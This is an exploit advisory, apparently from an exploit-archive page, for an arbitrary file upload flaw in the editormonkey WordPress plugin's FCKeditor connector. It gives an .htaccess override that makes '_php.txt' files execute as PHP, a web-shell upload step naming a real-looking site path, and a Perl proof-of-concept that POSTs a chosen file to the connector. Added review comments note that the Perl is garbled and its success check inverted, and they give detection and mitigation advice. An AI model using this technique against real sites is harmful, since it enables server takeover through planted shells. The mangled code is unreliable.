Title: WordPress Plugins (editormonkey-FCKe) Multiple File Upload Vulnerabilities
Author: KedAns-Dz
Platform: php
Impact: File Upload
Test:
If test.php =>
Creating .htaccess file:
<FilesMatch "_php.txt">
SetHandler application/x-httpd-php
</FilesMatch>
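-- And upload it ^ (this override only takes effect where Apache honours .htaccess files in the upload directory; `AllowOverride None` on that directory, together with an uploader that refuses dot-files, stops this step)
+ Upload Shell_php.txt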
+ Find him in: http://www.bkjia.com/UserFile/shell.php.txt
O0R: ThiS PErl Scr! Pt3:
#! /Usr/bin/perl
# NOTE(review): this listing was mangled in extraction/translation (keywords
# capitalised, `::` split into `: `, spaces inserted inside `$ var` and `\ n`),
# so it is not valid Perl as printed. The code is left exactly as the page
# shows it; the comments describe what each step is meant to do so the
# resulting traffic can be recognised in logs.
#
# Purpose: interactive proof-of-concept that sends one multipart POST to the
# FCKeditor upload connector bundled with the editormonkey WordPress plugin
# and prints a verdict based on the response body.
#
# The three calls below run the console commands `title`, `color` and `cls`;
# they only dress up the terminal and do not affect the request.
System ("title KedAns-Dz ");
System ("color 1e ");
System ("cls ");
Use strict;
Use warnings;
# HTTP client and request-builder modules used for the POST further down.
Use LWP: UserAgent;
Use HTTP: Request: Common;
# Banner text only (heredoc terminated by the INTRO line).
Print <INTRO;
| ================================================ =============|
| = W0rdPrE3S (editormonkey) Arbitrary Shell Upload |
|=> Provided By KedAns-Dz <|
| = E-mail: ked-h [at] hotmail.com |
| ================================================ =============|
INTRO
Print "\ n ";
# Reads the site base URL from standard input; it is concatenated with the
# connector path below without any validation.
Print "[!] Enter URL (f. e: http://target.com ):";
Chomp (my $ url = <STDIN> );
Print "\ n ";
# Reads a second operator-supplied value, used as the `NewFile` form field.
Print "[!] Enter File Path (f. e: C: \ Shell.php.gif): "; # File Path For Upload (usage: C: \ Sh3ll.php.gif)
Chomp (my $ file = <STDIN> );
# Builds and sends the request: a multipart/form-data POST to the plugin's
# fckeditor/editor/filemanager/upload/php/ connector with a `Type` query
# parameter and two form fields, `Actions` and `NewFile`. No cookies or
# credentials are attached anywhere in this script.
#
# Detection: look for POSTs to that connector path in web-server access logs
# and for new files (including .htaccess, or names containing "php") in the
# connector's upload directory.
# Mitigation: remove or block the bundled filemanager connector, and make the
# upload directory non-executable with .htaccess overrides turned off.
My $ ua = LWP: UserAgent-> new;
My $ re = $ ua-> request (POST $ url. '/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload. php? Type = FILE ',
Content_Type => 'multipart/form-data ',
Content =>
[
Actions => 'upload ',
NewFile => $ file,
]);
Print "\ n ";
# Verdict: on any successful HTTP status the body is searched for the string
# "Disabled "; the "Successfull" message is printed when that string IS
# present and the "Disabled! Failed!" message when it is absent. A failed
# HTTP status prints the last message instead.
# NOTE(review): because of that pairing, the printed verdict is not reliable
# evidence of whether anything was written to disk -- during incident review,
# confirm from the upload directory and the access log, not from tool output.
If ($ re-> is_success ){
If (index ($ re-> content, "Disabled ")! =-1) {print "[+] Exploit Successfull! File Uploaded! \ N ";}
Else {print "[-] File Upload Is Disabled! Failed! \ N ";}
} Else {print "[-] HTTP request Failed! \ N ";}
Exit;
_ END _
-----------------------------------------
// SP-thX t0: {Islampard}